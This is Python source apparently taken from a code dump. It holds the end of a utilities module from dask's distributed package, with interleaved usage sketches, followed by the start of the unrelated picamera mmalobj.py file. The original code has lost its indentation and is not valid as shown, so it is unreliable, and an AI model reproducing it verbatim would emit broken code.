logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
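# Illustrative usage sketch (not part of the original module): log_errors()
# wraps a block so that unexpected exceptions are logged before being
# re-raised; CommClosedError and gen.Return pass through without logging.
def _example_log_errors_usage(payload):
    with log_errors():
        # a KeyError here is written to the module logger, then re-raised
        return payload['address']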
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
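# Minimal usage sketch (not part of the original module): silence_logging()
# raises the threshold of existing StreamHandlers under the given root logger
# and returns the previous level so it can be restored afterwards.
def _example_silence_logging_usage():
    previous = silence_logging('ERROR')    # accepts a level name or number
    try:
        pass  # noisy operations here only emit ERROR and above
    finally:
        if previous is not None:
            silence_logging(previous)      # restore the old handler level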
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
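# Illustrative sketch (not part of the original module): queue_to_iterator()
# turns a Queue back into an iterator, treating a StopIteration instance as the
# end-of-stream sentinel; iterator_to_queue() fills a Queue on a daemon thread.
def _example_queue_round_trip():
    q = Queue()
    for item in [1, 2, 3]:
        q.put(item)
    q.put(StopIteration())             # end-of-stream sentinel
    return list(queue_to_iterator(q))  # -> [1, 2, 3]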
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
        a delimiter like ``b'\\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
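# Illustrative sketch (not part of the original module): seek_delimiter() moves
# the file position to just past the next delimiter, unless already at offset 0.
def _example_seek_delimiter_usage():
    from io import BytesIO
    f = BytesIO(b'Alice, 100\nBob, 200\nCharlie, 300')
    f.seek(5)                          # start in the middle of a record
    seek_delimiter(f, b'\n', 2**16)
    return f.tell()                    # -> 11, just past the first b'\n'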
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
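# Minimal sketch (not part of the original module): tmpfile() yields the path
# of a name that does not exist yet and removes whatever was created there
# once the with-block exits.
def _example_tmpfile_usage():
    with tmpfile('.json') as fn:
        with open(fn, 'w') as f:
            f.write('{"answer": 42}')
        with open(fn) as f:
            data = f.read()
    # by this point the temporary file has been removed again
    return data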
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
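# Illustrative sketch (not part of the original module): open_port() asks the
# OS for an ephemeral port and releases it again, so another process could in
# principle claim it before the caller binds to it.
def _example_open_port_usage():
    port = open_port()
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind(('127.0.0.1', port))   # usually succeeds, but may race
        server.listen(1)
        return port
    finally:
        server.close()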
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py',): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip', '.pyz'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in ('.zip', '.pyz'):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
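# Minimal sketch (not part of the original module): import_file() loads
# .py/.egg/.zip/.pyz files, clearing stale .pyc caches for plain .py files, and
# returns the list of (re)loaded modules.
def _example_import_file_usage():
    with tmpfile('.py') as fn:
        with open(fn, 'w') as f:
            f.write('VALUE = 42\n')
        modules = import_file(fn)      # -> [<module 'tmp...'>]
        return modules[0].VALUE        # -> 42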
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return '%0.2f PB' % (n / 1e15)
if n > 1e12:
return '%0.2f TB' % (n / 1e12)
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
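# Illustrative sketch (not part of the original module): asciitable() draws a
# '+---+' bordered, monospaced table whose column widths adapt to the widest
# cell; the worker addresses below are made up.
def _example_asciitable_usage():
    return asciitable(['worker', 'memory'],
                      [('tcp://10.0.0.1:8786', '1.20 GB'),
                       ('tcp://10.0.0.2:8786', '900.00 MB')])
    # -> a string containing bar, header row, bar, two data rows, bar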
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
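# Minimal sketch (not part of the original module): DequeHandler keeps the most
# recent log records in memory, which is handy for exposing recent logs over a
# dashboard or API. The logger name below is hypothetical.
def _example_deque_handler_usage():
    handler = DequeHandler(n=100)
    log = logging.getLogger('example.component')
    log.addHandler(handler)
    log.warning('something odd happened')
    return [record.getMessage() for record in handler.deque]
    # -> ['something odd happened']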
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules and tornado.version_info[0] >= 5:
jupyter_event_loop_initialized = False
if 'notebook' in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
jupyter_event_loop_initialized = (
traitlets.config.Application.initialized() and
isinstance(traitlets.config.Application.instance(), NotebookApp)
)
if not jupyter_event_loop_initialized:
import asyncio
import tornado.platform.asyncio
asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy())
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
'#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
'#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
mmalobj.py
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANALOG_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BLACK_LEVEL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CCM_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
# mmal.MMAL_PARAMETER_CROP: mmal.MMAL_PARAMETER_CROP_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
# mmal.MMAL_PARAMETER_CUSTOM_CCM: mmal.MMAL_PARAMETER_CUSTOM_CCM_T,
mmal.MMAL_PARAMETER_DIGITAL_GAIN: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LENS_SHADING_OVERRIDE: mmal.MMAL_PARAMETER_LENS_SHADING_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
